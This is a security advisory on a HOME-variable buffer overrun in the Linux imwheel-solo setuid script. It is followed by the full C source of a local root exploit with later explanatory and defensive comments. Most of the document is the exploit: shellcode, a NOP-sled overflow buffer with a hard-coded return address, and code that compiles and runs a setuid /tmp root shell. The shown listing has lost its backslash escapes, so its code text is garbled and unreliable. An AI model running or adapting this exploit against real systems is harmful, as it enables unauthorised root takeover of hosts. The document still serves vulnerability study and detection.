source: http://www.securityfocus.com/bid/1060/info
A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. When supplied a sufficiently long string containing machine-executable code, the imwheel program can be made to run arbitrary commands as root. This is due to a setuid-root Perl script named 'imwheel-solo', which invokes the imwheel program with effective UID 0.
/*** Halloween 4 local root exploit for imwheel-solo. Other distros
*** may be affected as well.
*** (C) 2000 by C-skills development. Under the GPL.
***
*** Bugdiscovery + exploit by S. Krahmer & Stealth.
***
*** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
***
*** other advisories and kewl stuff at:
*** http://www.cs.uni-potsdam.de/homepages/students/linuxer
***
***/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>
/* Payload bytes that main() places in the HOME variable (see setenv() there).
 * Per the author, its intended effect is:
 *     chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
 * i.e. to make the helper binary that main() compiles setuid root.
 * As rendered on this page the hex escapes have lost their backslashes, so the
 * literal below is not the byte sequence the author wrote; it is reproduced
 * unchanged. Defensive note: a setuid-root file appearing under /tmp is the
 * observable result this payload aims for.
 */
char shell[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x58x80x36x01x46xe2xfa"
"xeax0dx2ex75x6cx71x2ex63x6ex6ex6cx72x69x01x80xed"
"x66x2ax01x01x54x88xe4x57x52xe9x01x01x01x01x5ax80xc2xabx11"
"x01x01x30xc8x8cxb2x3bxeexfexfexb9xb7x01x01x01x88xcbx52x88"
"xf2xccx81xb8xecx08x01x01xb9x0ex01x01x01x52x88xf2xccx81x30"
"xc1x5ax5fx88xedx5cxc2x91x91x91x91x91x91x91x91";
/* Size of the oversized HOME value: 2048 bytes for the target's filename
 * buffer plus 8 bytes for the saved frame pointer and return address, per the
 * author. (Lowercase macro name kept as written; convention would be BUFLEN.)
 */
#define buflen (2048+8)
/* Entry point. As rendered on this page the string literals have lost their
 * backslash escape characters ("...n" where "...\n" was meant), so the listing
 * does not compile as shown; every code line is reproduced byte-identical.
 *
 * What the code does: writes a small C source to /tmp/boomsh.c and compiles it
 * with system(); builds an oversized HOME value out of shell[] and a hard-coded
 * address; runs imwheel-solo in a child process with that environment; then,
 * after a fixed delay, checks whether /tmp/boomsh became setuid and runs it.
 *
 * Defensive notes: the artefacts this leaves on a host are /tmp/boomsh.c and a
 * setuid-root /tmp/boomsh; a HOME value of roughly 2 KiB handed to a setuid
 * program is the triggering condition described in the advisory above.
 * Code-quality notes: the return values of system(), fork(), execl() and
 * stat() are never checked, fixed /tmp filenames are used, and memset() and
 * strlen() are called without <string.h> being included.
 */
int main(int argc, char **argv)
{
/* argv for the vulnerable setuid wrapper; im[1] is the NULL terminator. */
char *im[] = {
"/usr/X11R6/bin/imwheel-solo",
0
};
/* argv for the helper binary compiled below. */
char *a[] = {
"/tmp/boomsh",
0
};
FILE *f;
struct stat s;
/* Oversized HOME value. The +10 leaves a zeroed tail (see the two memset()
 * calls below) so setenv() sees a terminated string. */
char boom[buflen+10];
/* ret is a hard-coded address guess; argv[1] can shift it. */
int i = 0, j = 0, ret = 0xbfffee68; /* this address works for me */
/* "w+" on a fixed, predictable /tmp path follows symlinks and races with
 * other users of /tmp. */
if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
perror("fopen");
exit(errno);
}
printf("Creating boom-shell...n");
fprintf(f, "int main() {char *a[]={"/bin/sh",0};nsetuid(0);nexecve(*a, a, 0);nreturn 0;}n");
fclose(f);
/* Return value of system() is ignored; a failed compile is only noticed by
 * the stat() check further down. */
system("cc /tmp/boomsh.c -o /tmp/boomsh");
printf("Creating shellcode...n");
/* Zero the whole buffer, then fill the first buflen bytes with 0x90. */
memset(boom, 0, sizeof(boom));
memset(boom, 0x90, buflen);
/* atoi() gives no error indication for bad input; strtol() would. */
if (argc > 1)
ret += atoi(argv[1]);
else
printf("You can also add an offset to the commandline.n");
/* Copy shell[] so that it ends 4 bytes before buflen; ret is then stored in
 * those last 4 bytes. The long* store assumes sizeof(long) == 4 (ILP32) and
 * is an unaligned write through an incompatible pointer type. */
for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
boom[i] = shell[j++];
*(long*)(&boom[i]) = ret;
printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxern"
"Respect other users privacy!n");
/* The oversized value is delivered through HOME, the variable named in the
 * advisory above. DISPLAY is set presumably because imwheel-solo is an X11
 * program (note the /usr/X11R6 path) -- not verifiable from this file. */
setenv("HOME", boom, 1);
setenv("DISPLAY", ":0", 1);
printf("Invoking vulnerable program (imwheel-solo)...n");
/* fork() returning -1 is not handled. If execl() fails, the child does not
 * exit and falls through into the stat()/execve() code below alongside the
 * parent. */
if (fork() == 0) {
execl(im[0], im[0], im[1], im[2], 0);
}
/* Fixed delay; the parent never waits on the child, so the check below is
 * timing-dependent. */
sleep(4);
/* stat() return value is unchecked: on failure s stays zeroed, st_mode is 0,
 * and the "not SUID" branch is taken. */
memset(&s, 0, sizeof(s));
stat("/tmp/boomsh", &s);
if ((S_ISUID & s.st_mode) != S_ISUID) {
printf("Boom-shell not SUD-root! Wrong offset or patched version of imwheel.n");
return -1;
}
/* Huh? :-)
*/
printf("Knocking on heavens door...n");
/* envp is passed as NULL here. */
execve(a[0], a, 0);
return 0;
}